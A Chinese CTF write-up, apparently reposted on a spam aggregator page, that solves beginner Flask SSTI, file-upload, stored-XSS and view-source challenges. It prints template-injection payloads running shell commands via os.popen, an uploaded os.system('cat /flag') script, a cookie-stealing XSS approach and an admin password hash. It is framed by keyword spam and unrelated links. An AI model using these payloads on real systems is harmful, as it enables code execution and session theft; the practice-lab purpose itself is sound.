当前位置: 首页 > news >正文

建设网站什么软件比较好dedecms调用不同数据库wordpress

建设网站什么软件比较好,dedecms调用不同数据库wordpress,企业怎么做网站,网站建设的实验步骤平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。 平台有题库、赛事预告、工具库、Writeup库等模块。 ------------------------------- Simple_SSTI_1 启动环境: 页面提示传入参数f…

            平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。

           平台有题库、赛事预告、工具库、Writeup库等模块。

-------------------------------

Simple_SSTI_1

                         启动环境:

               

              页面提示传入参数flag 

 

           F12查看源码得到第二个提示

      SECRET_KEY(秘钥)是Flask中重要的一个配置值,在这题,构造语句查看它,得到flag

      SECRET_KEY(秘钥)是Flask中重要的一个配置值,在这题,构造语句查看它,得到flag

-------------------------------------------------

Simple_SSTI_2

                         启动环境:

   页面提示传入参数flag 

             f12查看源码,发现没有提示信息。

            

           通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件(读取网站系统目录),发现如下的文件夹:

           通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 

            通过{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}读取flag内容,读取flag内容,最终得到flag 

 

----------------------------------------

Flask_FileUpload

                                启动环境:

           发现是上传文件

        随便找张图片上传试试 

     查看源代码f12进入    注释告诉我们,会运行python的文件

     根据需求,编写代码  写一个python代码改成jpg或者png格式的文件

import os
os.system('cat /flag')

 

  上传 看看     在元素中即可查看flag

 

----------------------------------------

留言板:

              开启环境:

提示需登录后台,需要使用python平台接收flag

打开场景后,出现了下面的界面。

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies
  • 测试一下script代码:

          发现确实可以读取到。

         使用目录扫描工具-御剑进行扫描试试

        得到后台管理地址:/admin.php 

          账号密码不知道?
          需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
           所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。

           将项目中提供的代码输入留言板中:

 在查看扫描出来的db.sql(本人没扫出来)不知道他们怎么扫出来的

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)/*!40101 SET NAMES utf8 */;#
# Structure for table "text"
#CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (`Id` int(11) NOT NULL AUTO_INCREMENT,`text` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "text"
#/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;#
# Structure for table "user"
#DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (`Id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) DEFAULT NULL,`password` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "user"
#/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

  

           底部存在一组 user passwd

 

         尝试解码登录

      反射我们刚刚xss语句,我们在回到xss平台获得信息

       查看获得cookie,flag加密信息,解码获得flag

-------------------------------------------

滑稽:

                    开启环境:

                打开为以下界面

           查看源代码 获得flag

http://www.yayakq.cn/news/456438/

相关文章:

  • 做搜狗手机网站点击软网站建设服务类型现状
  • 正规的网站建设公5151ppt网站建设
  • 设计接单网站大全可以做软件的网站有哪些功能
  • 如何在百度上建立网站南京电商网站开发
  • 海棠网站是什么意思wordpress不支持ie9
  • 乐清做网站培训.net网站做优化
  • 网站开发中为什么有两个控制层做网站 域名是怎么回事
  • 望谟网站建设未来5年网络规划设计师
  • php网站开发如何实现删除功能深圳装修公司口碑排名
  • 用路由侠做网站在电脑上做网站
  • 动漫做的游戏 迅雷下载网站电子商务网站建设基础步骤
  • 网站ui设计给用户提交什么网络营销策划
  • 做化妆品的网站二建转注辽宁建设主管部门网站
  • 南京网站策划公司近期热点话题
  • 做cps的网络文学网站网站正在维护中 模板
  • 安阳专业做网站公司wordpress官方中文主题
  • 可以做相册的网站职业培训网络平台
  • 廊坊网站排名方案绍兴大公司有哪些
  • 建设网站相关法律条文文创产品设计书籍
  • 校园网站建设管理办法洛阳网站建设seo
  • 中卫网站设计公司苏州市建设局安监站网站
  • 北京市建设工程造价管理处 网站经典重庆论坛上不了了
  • 包装建设网站网上做广告宣传
  • 唐山哪家网站好网页设计代码免费
  • 建设通网站是做什么的怎么制作游戏需要什么软件
  • 通信公司网站建设企业网站建设国内外现状
  • 手机网站的建设个人网站可以名字写官网吗
  • 海口市住房和城乡建设局 网站最美logo图案大全
  • 淘宝网站推广策划方案天助网站
  • 快速搭建网站视频教程南阳设计公司排名